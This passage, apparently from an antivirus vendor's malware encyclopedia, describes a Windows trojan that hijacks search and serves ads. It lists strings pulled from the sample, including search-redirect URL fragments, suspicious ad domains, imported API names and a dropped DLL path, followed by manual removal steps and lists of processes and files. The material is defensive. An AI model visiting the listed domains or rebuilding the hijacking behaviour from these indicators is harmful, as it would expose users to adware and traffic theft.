(xpsp_sp2_qfe.071206-1251)</pre><pre>6.00.2900.3300 (xpsp.080125-2028)</pre><pre>6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)</pre><pre>6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)</pre><pre>6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)</pre><pre>6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)</pre><pre>6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)</pre><pre>6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)</pre><pre>6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)</pre><pre>6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)</pre><pre>6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)</pre><pre>6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)</pre><pre>6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)</pre><pre>6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)</pre><pre>6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)</pre><pre>6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)</pre><pre>6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)</pre><pre>6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)</pre><pre>6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)</pre><pre>6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)</pre><pre>6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)</pre><pre>6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)</pre><pre>6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)</pre><pre>6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)</pre><pre>6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)</pre><pre>6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)</pre><pre>6.00.2900.5512 (xpsp.080413-2105)</pre><pre>6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)</pre><pre>6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)</pre><pre>6.00.2900.5626 (xpsp_sp3_gdr.080623-1315)</pre><pre>6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)</pre><pre>6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)</pre><pre>6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)</pre><pre>6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)</pre><pre>6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)</pre><pre>6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)</pre><pre>6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)</pre><pre>6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)</pre><pre>6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)</pre><pre>6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)</pre><pre>6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)</pre><pre>6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)</pre><pre>6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)</pre><pre>6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)</pre><pre>6.00.2900.5897 (xpsp_sp3_qfe.091028-1717)</pre><pre>6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)</pre><pre>6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)</pre><pre>6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)</pre><pre>6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)</pre><pre>6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)</pre><pre>6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)</pre><pre>6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)</pre><pre>6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)</pre><pre>6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)</pre><pre>6.00.2900.6036 (xpsp_sp3_qfe.100908-2019)</pre><pre>6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)</pre><pre>6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)</pre><pre>6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)</pre><pre>6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)</pre><pre>6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)</pre><pre>6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)</pre><pre>6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)</pre><pre>6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)</pre><pre>6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)</pre><pre>6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)</pre><pre>6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)</pre><pre>6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)</pre><pre>6.00.2900.6168 (xpsp_sp3_gdr.111101-1829)</pre><pre>6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)</pre><pre>6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)</pre><pre>6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)</pre><pre>6.00.2900.6197 (xpsp_sp3_gdr.120228-1720)</pre><pre>6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)</pre><pre>6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)</pre><pre>6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)</pre><pre>6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)</pre><pre>6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)</pre><pre>6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)</pre><pre>6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)</pre><pre>6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)</pre><pre>6.00.3790.0 (srv03_rtm.030324-2048)</pre><pre>6.00.3790.118 (srv03_gdr.031205-1652)</pre><pre>6.00.3790.118 (srv03_qfe.031205-1652)</pre><pre>6.00.3790.1830 (srv03_sp1_rtm.050324-1447)</pre><pre>6.00.3790.186 (srv03_gdr.040410-1234)</pre><pre>6.00.3790.186 (srv03_qfe.040410-1236)</pre><pre>6.00.3790.2509 (srv03_sp1_gdr.050815-1517)</pre><pre>6.00.3790.2653 (srv03_sp1_gdr.060303-1536)</pre><pre>6.00.3790.2653 (srv03_sp1_qfe.060303-1552)</pre><pre>6.00.3790.2732 (srv03_sp1_gdr.060623-0310)</pre><pre>6.00.3790.2732 (srv03_sp1_qfe.060623-0318)</pre><pre>6.00.3790.2817 (srv03_sp1_gdr.061023-0100)</pre><pre>6.00.3790.2993 (srv03_sp1_gdr.070817-1316)</pre><pre>6.00.3790.2993 (srv03_sp1_qfe.070817-1316)</pre><pre>6.00.3790.3041 (srv03_sp1_gdr.071107-1901)</pre><pre>6.00.3790.3041 (srv03_sp1_qfe.071107-1901)</pre><pre>6.00.3790.3091 (srv03_sp1_gdr.080215-1206)</pre><pre>6.00.3790.3091 (srv03_sp1_qfe.080215-1206)</pre><pre>6.00.3790.3194 (srv03_sp1_gdr.080819-1207)</pre><pre>6.00.3790.3194 (srv03_sp1_qfe.080819-1207)</pre><pre>6.00.3790.3229 (srv03_sp1_gdr.081016-1620)</pre><pre>6.00.3790.3229 (srv03_sp1_qfe.081016-1620)</pre><pre>6.00.3790.3304 (srv03_sp1_gdr.090303-1204)</pre><pre>6.00.3790.3304 (srv03_sp1_qfe.090303-1204)</pre><pre>6.00.3790.3959 (srv03_sp2_rtm.070216-1710)</pre><pre>6.00.3790.4186 (srv03_sp2_gdr.071108-1306)</pre><pre>6.00.3790.4186 (srv03_sp2_qfe.071108-1306)</pre><pre>6.00.3790.4210 (srv03_sp2_qfe.071221-1418)</pre><pre>6.00.3790.4237 (srv03_sp2_gdr.080215-1206)</pre><pre>6.00.3790.4237 (srv03_sp2_qfe.080215-1206)</pre><pre>6.00.3790.4275 (srv03_sp2_gdr.080417-1307)</pre><pre>6.00.3790.4275 (srv03_sp2_qfe.080417-1307)</pre><pre>6.00.3790.4324 (srv03_sp2_qfe.080630-1205)</pre><pre>6.00.3790.4357 (srv03_sp2_gdr.080819-1207)</pre><pre>6.00.3790.4357 (srv03_sp2_qfe.080819-1207)</pre><pre>6.00.3790.4392 (srv03_sp2_gdr.081016-1620)</pre><pre>6.00.3790.4392 (srv03_sp2_qfe.081016-1620)</pre><pre>6.00.3790.4470 (srv03_sp2_gdr.090303-1204)</pre><pre>6.00.3790.4470 (srv03_sp2_qfe.090303-1204)</pre><pre>6.00.3790.4504 (srv03_sp2_gdr.090428-1405)</pre><pre>6.00.3790.4504 (srv03_sp2_qfe.090428-1405)</pre><pre>6.00.3790.4539 (srv03_sp2_gdr.090626-1428)</pre><pre>6.00.3790.4539 (srv03_sp2_qfe.090626-1428)</pre><pre>6.00.3790.4589 (srv03_sp2_gdr.090914-1233)</pre><pre>6.00.3790.4589 (srv03_sp2_qfe.090914-1233)</pre><pre>6.00.3790.4672 (srv03_sp2_gdr.100225-1230)</pre><pre>6.00.3790.4672 (srv03_sp2_qfe.100225-1230)</pre><pre>6.00.3790.4696 (srv03_sp2_gdr.100419-1942)</pre><pre>6.00.3790.4732 (srv03_sp2_gdr.100623-0356)</pre><pre>6.00.3790.4732 (srv03_sp2_qfe.100623-0356)</pre><pre>6.00.3790.4772 (srv03_sp2_gdr.100908-1010)</pre><pre>6.00.3790.4772 (srv03_sp2_qfe.100908-1010)</pre><pre>6.00.3790.4795 (srv03_sp2_qfe.101103-0357)</pre><pre>6.00.3790.4807 (srv03_sp2_gdr.101220-0307)</pre><pre>6.00.3790.4807 (srv03_sp2_qfe.101220-0307)</pre><pre>6.00.3790.4835 (srv03_sp2_gdr.110222-0239)</pre><pre>6.00.3790.4835 (srv03_sp2_qfe.110222-0239)</pre><pre>6.00.3790.4857 (srv03_sp2_gdr.110425-0335)</pre><pre>6.00.3790.4857 (srv03_sp2_qfe.110425-0335)</pre><pre>6.00.3790.4879 (srv03_sp2_gdr.110621-0342)</pre><pre>6.00.3790.4879 (srv03_sp2_qfe.110621-0342)</pre><pre>6.00.3790.4904 (srv03_sp2_gdr.110905-0334)</pre><pre>6.00.3790.4904 (srv03_sp2_qfe.110905-0334)</pre><pre>6.00.3790.4929 (srv03_sp2_gdr.111104-0342)</pre><pre>6.00.3790.4929 (srv03_sp2_qfe.111104-0342)</pre><pre>6.00.3790.4944 (srv03_sp2_gdr.111216-0308)</pre><pre>6.00.3790.4944 (srv03_sp2_qfe.111216-0308)</pre><pre>6.00.3790.4969 (srv03_sp2_gdr.120228-0234)</pre><pre>6.00.3790.4969 (srv03_sp2_qfe.120228-0234)</pre><pre>6.00.3790.5004 (srv03_sp2_gdr.120515-0336)</pre><pre>6.00.3790.5004 (srv03_sp2_qfe.120515-0336)</pre><pre>6.00.3790.5029 (srv03_sp2_gdr.120628-0335)</pre><pre>6.00.3790.5029 (srv03_sp2_qfe.120628-0335)</pre><pre>6.00.3790.5060 (srv03_sp2_gdr.120824-0334)</pre><pre>6.00.3790.5060 (srv03_sp2_qfe.120824-0334)</pre><pre>6.00.3790.5080 (srv03_sp2_gdr.121026-1534)</pre><pre>6.00.3790.5080 (srv03_sp2_qfe.121026-1534)</pre><pre>HTTP/1.</pre><pre>HTTP/1.1 302 Moved Temporarily</pre><pre>http://www.baidu.com/s? tn=</pre><pre>http://www.baidu.com/</pre><pre>http://www.sogou.com/sogou? pid=</pre><pre>http://www.sogou.com/index. pid=</pre><pre>http://rlt.inte.sogou.com/</pre><pre><html><head><meta http-equiv="refresh" content="0;url=</pre><pre>[i 1]){b.href=</pre><pre>[i]==b.id){if (b.href!=</pre><pre>.length;i =2){if (</pre><pre>&cmv=X</pre><pre>window.sogou_adclk</pre><pre>http://www.baidu.com/ tn=-wd=-word=</pre><pre>tn=%s</pre><pre>http://www.hao123.com/ tn=</pre><pre>.google.com</pre><pre>pv.sogou.com</pre><pre>pb.sogou.com</pre><pre>.tanghulu.cc</pre><pre>.zclm8.com</pre><pre>.wq581.com</pre><pre>.maimeng8.com</pre><pre>.5sla.com</pre><pre>.wb360.net</pre><pre>.renren.com</pre><pre>.jj123.com.cn</pre><pre>.iwb110.com</pre><pre>.wb12318.com</pre><pre>.woai310.com</pre><pre>.58lianmeng.com</pre><pre>dwVAOffset:X</pre><pre>.data</pre><pre>.text</pre><pre>FILE_EXECUTE</pre><pre>FILE_GENERIC_EXECUTE</pre><pre>GENERIC_EXECUTE</pre><pre>%WinDir%\Explorer.EXE</pre><pre>%System%\DqKgbb.dll</pre><pre>{6795ED75-58AA-8E4C-A8EA-3CAD7C47AB03}</pre><pre>http://index.woai310.com/index.htm?u=52097</pre><pre>GetProcessHeap</pre><pre>WinExec</pre><pre>GetCPInfo</pre><pre>RegDeleteKeyA</pre><pre>RegQueryInfoKeyA</pre><pre>RegEnumKeyExA</pre><pre>RegCreateKeyExA</pre><pre>RegCreateKeyA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>UrlUnescapeA</pre><pre>EnumWindows</pre><pre>SetWindowsHookExA</pre><pre>EnumChildWindows</pre><pre>InternetCanonicalizeUrlA</pre><pre>InternetCrackUrlA</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>KERNEL32.DLL</pre><pre>iphlpapi.dll</pre><pre>OLEAUT32.dll</pre><pre>PSAPI.DLL</pre><pre>USER32.dll</pre><pre>VERSION.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>Loader.dll</pre><pre>{9a4dda61-1d3a-49b7-9849-dac6cd30a393}</pre><pre>AutoConfigURL</pre><pre>_IID_IWEBBROWSER</pre><pre>MSAFD Tcpip [TCP/IP]</pre><pre>MSAFD Tcpip [UDP/IP]</pre><pre>MSAFD Tcpip [RAW/IP]</pre><pre>RSVP UDP Service Provider</pre><pre>\Device\NetBT_Tcpip</pre><pre>RSVP TCP Service Provider</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2</pre><pre>ikeeper.dll</pre><pre>rsvpsp.dll</pre><pre>nwprovau.dll</pre><pre>winrnr.dll</pre></div><div class=" blog_tab /><p><strong class="font_20"><span style="font-size:medium;">Remove it with Ad-Aware</span></strong></p><ol><li>Click (<a href="http://lavasoft.com/thankyou.php?internal=true&inter=encyclopedia"><span style="color: #0000ff;">here</span></a>) to download and install Ad-Aware Free Antivirus.</li><li>Update the definition files.</li><li>Run a full scan of your computer.</li></ol><p><strong class="font_20"><span style="font-size:medium;">Manual removal*</span></strong></p><ol><li>Scan a system with an anti-rootkit tool.<br /></li><li>Terminate malicious process(es) (<a href="http://www.lavasoft.com/mylavasoft/malware-removal-support/blog/how-to-end-a-process-with-the-task-manager"><span style="color: #0000ff;">How to End a Process With the Task Manager</span></a>):<p style="padding-left: 30px; font-size: x-small; color: #ff0000;">EXE_temp1.EXE:308<br />shock.exe:3516<br />taskkill.exe:1700<br />EXE_temp4.EXE:1516<br />ping.exe:1580<br />ping.exe:1416<br />svchots.exe:3760<br />EXE_temp2.exe:1176<br />huodongtongzhi.exe:1032<br />netsh.exe:3916<br />MiniIE.exe:3436<br />qtool.exe:3460<br />EXE_temp0.exe:980<br />wpzir.exe:3300<br />%original file name%.exe:1040<br /></p></li><li>Delete the original Trojan file.<br /></li><li>Delete or disinfect the following files created/modified by the Trojan:<p style="padding-left: 30px; font-size: x-small; color: #ff0000;">%Documents and Settings%\%current user%\Local Settings\Temp\bt3742.bat (48 bytes)<br />%WinDir%\JMt\sys32\shock_new.dat0 (54 bytes)<br />%WinDir%\JMt\sys32\shock_new.dat1 (3 bytes)<br />%WinDir%\JMt\sys32\shock.dll (845 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\bt5867.bat (55 bytes)<br />%Program Files%\Common Files\Lkcjzquw.exe (3511647 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[1].css (1 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\b54815b87c96d562a1e3eb3a6f418[1].gif (1661 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].html (2 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\aaf38b09fdfe9c4d8687973dec764[1].gif (570 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[2].css (2 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[2].css (4 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[1].css (1 bytes)<br />%WinDir%\JMt\win32\DPro.sys (784 bytes)<br />%WinDir%\JMt\win32\reTcp.sys (196 bytes)<br />%WinDir%\JMt\win32\config.ini (46 bytes)<br />%WinDir%\JMt\win32\rename.exe (5480 bytes)<br />%Program Files%\Common Files\mdhc\dsau.exe (1702 bytes)<br />%WinDir%\share\kbdf.dat (122 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~355ADAFA.ELOG (438554 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~7AB73D6F.TMP (52 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~09E7FCEE.TMP (128 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~2D915D30.TMP (50 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~4BB0A38B.TMP (98 bytes)<br />%Documents and Settings%\%current user%\Desktop\Ê·ÉÃÂÂ×î¾¢±¬ÓÎ÷.lnk (1 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~5454C00A.TMP (827 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~0169CD4B.TMP (141 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\gjmxbvj.ico (388 bytes)<br />%WinDir%\share\ico.dll (129 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\zeimroy.ico (388 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~7360087A.TMP (3835 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\RarLhr\acsvc.exe (3838 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\ioergor.tmp (132 bytes)<br />%System%\DqKgbb.dll (141 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~25C6BFA8.TMP (163 bytes)<br />%Documents and Settings%\%current user%\Desktop\³ÉÈËÓÎ÷.lnk (1 bytes)<br />%WinDir%\share\rsvp\objs.exe (52 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\~72A678D6.TMP (146 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\Sawrdxeyd.exe (1333 bytes)<br />%WinDir%\JMt\wpzir.exe (41 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\iwvsbxk.txt (1281 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\itotzvy.txt (673 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\atxwrlr.txt (55 bytes)<br />%WinDir%\JMt\sys32\whitelist.txt (3 bytes)<br />%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)<br />%WinDir%\JMt\win32\svchots.txt (70868 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\uafuzsr.txt (2105 bytes)<br />%WinDir%\JMt\sys32\shock.txt (18796 bytes)<br />%WinDir%\JMt\sys32\whitelist.dat (2 bytes)<br />%WinDir%\JMt\sys32\qtool.exe (155 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\efjtrit.txt (3 bytes)<br />%WinDir%\JMt\First.txt (6988 bytes)<br />%WinDir%\JMt\flist.bin (620 bytes)<br />%WinDir%\JMt\sys32\shock.exe (111 bytes)<br />%WinDir%\JMt\sys32\qtool.txt (26868 bytes)<br />%System%\drivers\HideSys.sys (15 bytes)<br />%WinDir%\JMt\win32\svchots.exe (1695 bytes)<br />%WinDir%\JMt\MiniIE.txt (46228 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\sjapgfo.txt (3361 bytes)<br />%WinDir%\JMt\MiniIE.exe (272 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp2.exe (20 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp1.EXE (673 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp4.EXE (2105 bytes)<br />%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp3.exe (673 bytes)</p></li><li>Clean the Temporary Internet Files folder, which may contain infected files (<a href="http://www.lavasoft.com/mylavasoft/malware-removal-support/blog/how-to-clean-the-temporary-internet-files-folder"><span style="color: #0000ff;">How to clean Temporary Internet Files folder</span></a>).<br /></li><li>Reboot the computer.<br /></li></ol>*Manual removal may cause unexpected system behaviour and should be performed at your own risk.</head></html></pre></head></html></pre></head></html></pre></hsT-y>